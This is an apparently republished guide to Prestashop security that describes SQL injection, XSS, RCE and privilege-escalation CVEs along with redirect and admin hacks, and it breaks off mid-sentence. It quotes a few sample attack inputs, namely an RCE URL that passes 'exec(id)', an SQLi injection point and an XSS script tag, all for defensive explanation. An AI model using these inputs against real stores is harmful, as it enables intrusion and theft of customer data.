Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

A Complete Guide on Prestashop Security.


E-commercehas gained momentum within these few years. As a result, multiple online platforms likeMagento,Opencart,andPrestashop have sprung up. Prestashop has been gaining popularity globally. Thanks to its open source nature. However, like any online store, the utmost priorityfor the customers is thePrestashop security. Multiple Prestashop security issues have been uncovered in recent years. According to the book PrestaShop Module Development ,

When you install, configure, or improve a PrestaShop webshop, you won’t code all your modules. You will probably buy modules or download free ones. In all cases, it’s always good to read the code of these modules.However, beware―there are a hundred ways to obfuscate this kind of malicious code.

Contents of This Guide

1 Prestashop Security: Common Hacks in Prestashop 1.1 SQL Injection in Prestashop 1.2 Cross-site Scripting in Prestashop 1.3 Remote Code Execution in Prestashop 1.4 Privilege Escalation in Prestashop 1.5 Prestashop Redirect Hack 1.6 Admin Hack in Prestashop 1.7 Google Keyword Hack in Prestashop 1.8 Credit card Hack in Prestashop 2.3 DNS Misconfiguration 2.4 Outdated Modules 3 Best Security Practices for Prestashop 3.2 Strong Credentials 3.5 Prestashop Security Modules 3.6 Updates and Backup 4 Prestashop Firewall and Antivirus 5 Prestashop Security Audit Prestashop Security: Common Hacks in Prestashop

While setting up a Prestashop is easy, much caution is needed to keep it secure. Online stores may manage sensitive info like credit card details. This is a huge responsibility for businesses to deal with such sensitive data. Attackers are at play constantly to steal this data and sell on tor sites for dirt cheap prices. In order to keep Prestashop store secure, let’s take a look at the ways, Prestashop security can be exploited.

SQL Injection in Prestashop An SQLivulnerability was exposed in Prestashop. This occurred due to lack of input sanitization in one of its module. The module vulnerable was Responsive Mega Menu (Horizontal+Vertical+Dropdown) . An SQLi could be injected through function calls in the code parameter.This was dubbed asCVE-2018-8824. Before this, the component id_manifacturer was found prone to SQLi. Through the URL http://example.com/ajax/getSimilarManufacturer.php?id_manufacturer=3[SQL-injection] .This component was vulnerable to a blind SQLi. By exploiting an SQLi, the attacker can: Read contents from the database. Find out the user login details and then log in as admin. Steal user credit card info in case it was stored locally. Conduct other attacks from the sensitive info gained from the database.

Prestashop Security compromised? Drop us a message on the chat widget and we’d be happy to assist you with your Prestashop website. Secure your Prestashop website now .

Cross-site Scripting in Prestashop

Multiple XSS flaws have been found in Prestashop including the one this year. The one discovered at the beginningof the year was dubbed asCVE-2018-5681. However, it required the attacker to log in the system first in order to exploit. The other more severe XSS vulnerability was in the Contact Form module . It was more severe as it was Persistent in nature. The vulnerability allowed to bypass the isCleanHtml() function. It could be bypassed using thebase64 encoding. Moreover, this can be used to inject HTML codes. Thus editing the display of messages.

A Complete Guide on Prestashop Security.

All the input provided in the image is in base64 format. Both, when decoded, would be <script>alert()</script> . Thus all the messages sent using Contact Form will be visible to the admin after logging in. So, using this, an attacker can:

Firstly inject the malicious code in the messages. Load admin cookie stealing scripts from a malicious domain. After getting the cookie, the attacker can log in as admin. This opens the site to all kinds of further attacks. Moreover, the attacker can hook the admin’s browser and launch browser exploits. Remote Code Execution in Prestashop

Prestashop suffered from an RCE vulnerability this year. The module responsible for it was Responsive Mega Menu Pro . The complete URL is http:///modules/bamegamenu/ajax_phpcode.php?code=echo exec(id); . Dubbed as CVE-2018-8823 . This issue allowed attackers to run PHP code arbitrarily on the server. Using this the attacker could have:

Run PHP commands on the server. Read/modify sensitive files. Tried to escalate privileges. After that, the attacker can now execute commands as an admin. Thus completing the system takeover! Privilege Escalation in Prestashop

Prestashop suffered from a Privilege escalation issue which was dubbed as CVE-2018-13784 . This issue was due to mishandling of the cookie encryption. Prestashop usedBlowfish/ECD or AES encryption which was vulnerable to padding attacks. An attacker could alter the contents of cookie to gain admin privileges. Thus, accessing the resources not intended for the attacker. Exploiting this the attacker can:

Get hold of any customer session. Steal sensitive info such as customer information, orders, credit card info etc. Obtain access to the admin dashboard through CSRF or other attacks. Also, this can lead to remotecode execution. Prestashop Redirect Hack

Often malicious actors try to inject malicious redirect javascript code. Therefore, when the customers visit the site it typically redirects them to adult sites. Although at times it could be other sites selling products. Or maybe even harvesting clicks for the attacker. Especially the small stores are worst affected. Thus, a Prestashop redirect hack can:

Result in the store getting blacklisted by search engines. Redirect up to 90 percent of user traffic. Loss of user trust in the store. The decrease in sales due to redirect malware. Turns your Prestashop store into a spam garage. Admin Hack in Prestashop

Often Prestashop dashboard is hacked due to lapses in Prestashop security. The admin panel is one of the most sensitive areas of the store. It must be kept hidden from the internet and with a safe password. However, when compromised it could lead to:

Creating multi

Viewing all articles
Browse latest Browse all 12749